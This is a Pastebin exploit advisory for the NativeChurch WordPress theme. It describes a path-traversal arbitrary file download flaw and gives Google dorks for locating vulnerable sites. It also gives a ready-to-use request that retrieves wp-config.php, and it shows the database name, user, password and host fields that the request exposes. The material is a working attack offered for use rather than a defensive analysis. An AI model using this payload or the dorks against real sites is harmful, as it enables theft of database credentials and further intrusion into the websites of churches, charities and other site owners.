Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 26/02/2019
- # Vendor Homepage : themeforest.net
- # Software Information Link :
- themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
- # Software Affected Versions : WordPress From 3.9 to 5.0.x
- Compatible with Bootstrap 3.x - bbPress 2.5.x
- From WooCommerce 2.1.x To WooCommerce 3.4.x,
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
- inurl:''inurl:/wp-content/themes/NativeChurch/download/''
- # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
- CWE-23 [ Relative Path Traversal ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- NativeChurch is a powerful WordPress Theme designed & developed for Church,
- Charity, Non-Profit and Religious Websites and comes handy
- for Portfolio/Corporate Websites as well.
- ####################################################################
- # Impact :
- ***********
- * The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers
- download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
- An attacker can exploit this issue to download arbitrary files within the context
- of the web server process. Information obtained may aid in further attacks.
- Attackers can use a browser to exploit this issue.
- * The software uses external input to construct a pathname that should be within a
- restricted directory, but it does not properly neutralize sequences
- such as ".." that can resolve to a location that is outside of that directory.
- ####################################################################
- # Arbitrary File Download Exploit :
- ******************************
- /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
- # Example Informations about MySQL WordPress Configuration File :
- ***********************************************************
- /** Nom de la base de données de WordPress. */
- define('DB_NAME',
- /** Utilisateur de la base de données MySQL. */
- define('DB_USER',
- /** Mot de passe de la base de données MySQL. */
- define('DB_PASSWORD',
- /** Adresse de l'hébergement MySQL. */
- define('DB_HOST',
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment